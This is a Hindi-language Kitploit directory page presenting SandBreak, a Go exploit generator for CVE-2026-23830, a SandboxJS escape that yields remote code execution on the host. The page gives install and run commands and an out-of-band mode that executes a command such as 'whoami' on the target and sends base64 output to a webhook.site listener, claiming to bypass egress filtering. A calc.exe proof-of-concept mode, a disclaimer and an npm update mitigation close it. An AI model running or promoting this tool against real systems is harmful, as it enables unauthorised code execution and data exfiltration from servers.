Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23830-SandBreak — CVE-2026-23830 के लिए एक्सप्लॉइट पेलोड उत्पन्न और वितरित करता है, जो एक SandboxJS एस्केप है, जिसमें ब्लाइंड OOB एक्सफिल्ट्रेशन और लोकल कैल्क PoC के लिए मोड शामिल हैं। HTTP/HTTPS लिसनर का समर्थन करता है और मिनिफाइड JavaScript पेलोड उत्पन्न करता है। | Kitploit
उपकरण/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

CVE-2026-23830 के लिए एक्सप्लॉइट पेलोड उत्पन्न और वितरित करता है, जो एक SandboxJS एस्केप है, जिसमें ब्लाइंड OOB एक्सफिल्ट्रेशन और लोकल कैल्क PoC के लिए मोड शामिल हैं। HTTP/HTTPS लिसनर का समर्थन करता है और मिनिफाइड JavaScript पेलोड उत्पन्न करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
167 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

SandBreak

CVE-2026-23830 एक्सप्लॉइट जनरेटर और ऑटो-पॉन टूल

Go Version License Type

SandBreak एक मजबूत, Go-आधारित एक्सप्लॉइट जनरेटर है जिसे SandboxJS Escape भेद्यता (CVE-2026-23830) का लाभ उठाने के लिए डिज़ाइन किया गया है।

यह टूल sandboxjs के पुराने संस्करणों में असुरक्षित AsyncFunction कंस्ट्रक्टर का शोषण करता है, जिससे हमलावर V8 सैंडबॉक्स वातावरण से बाहर निकलकर होस्ट सिस्टम पर मनमाना कोड निष्पादित कर सकते हैं। यह कई पेलोड मोड का समर्थन करता है, जिनमें ब्लाइंड OOB एक्सफिल्ट्रेशन, डिफेसमेंट, और एरर-आधारित RCE शामिल हैं।


विशेषताएँ

  • 2 अटैक मोड:
    • oob: ब्लाइंड परिदृश्यों के लिए आउट-ऑफ-बैंड डेटा एक्सफिल्ट्रेशन (HTTP/HTTPS)।
  • calc: calc.exe पॉप करता है (क्लासिक PoC)।
  • स्मार्ट OOB: सर्वर क्रैश को रोकने के लिए HTTP बनाम HTTPS का स्वचालित रूप से पता लगाता है।
  • Go-आधारित: सिंगल बाइनरी, हमलावर मशीन पर कोई निर्भरता आवश्यक नहीं।
  • हल्का: शुद्ध, मिनिफाइड JavaScript पेलोड उत्पन्न करता है।

  • इंस्टॉलेशन

    रिपॉजिटरी को क्लोन करें और चलाएँ:

    root@kitploit:~
    git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
    cd CVE-2026-23830-SandBreak
    go run CVE-2026-23830.go
    

    उपयोग

    root@kitploit:~
    go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
    

    1. OOB मोड (ब्लाइंड RCE - प्रोफेशनल)

    इसका उपयोग तब करें जब आपके पास कोई आउटपुट फीडबैक न हो। यह कमांड निष्पादित करता है और Base64-एन्कोडेड परिणाम को आपके लिसनर (जैसे, webhook.site) पर भेजता है।

    root@kitploit:~
    go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
    

    नेटवर्क त्रुटियों को संभालकर बुनियादी ईग्रेस फ़िल्टरिंग क्रैश को सफलतापूर्वक बायपास करता है।

    2. कैल्क मोड (लोकल टेस्ट)

    Windows सर्वर पर कैलकुलेटर पॉप करता है।

    root@kitploit:~
    go run CVE-2026-23830.go -mode calc
    

    प्रूफ ऑफ कॉन्सेप्ट (PoC)

    परिदृश्य: OOB एक्सफिल्ट्रेशन

    साइट पर कोई विज़ुअल आउटपुट न होने के बावजूद हमलावर Webhook के माध्यम से सर्वर का उपयोगकर्ता डेटा प्राप्त कर रहा है।


    अस्वीकरण

    यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत पेनेट्रेशन टेस्टिंग के लिए बनाया गया है।

    • इस टूल का उपयोग उन सिस्टमों पर न करें जिनके मालिक आप नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।
    • लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

    शमन (मिटिगेशन)

    sandboxjs को नवीनतम संस्करण में अपग्रेड करें जहाँ AsyncFunction कंस्ट्रक्टर को ठीक से सैंडबॉक्स किया गया है।

    root@kitploit:~
    npm update sandboxjs
    

    लेखक: Meysam Bal-afkan

    लाइसेंस: MIT

    टूल डाउनलोड करें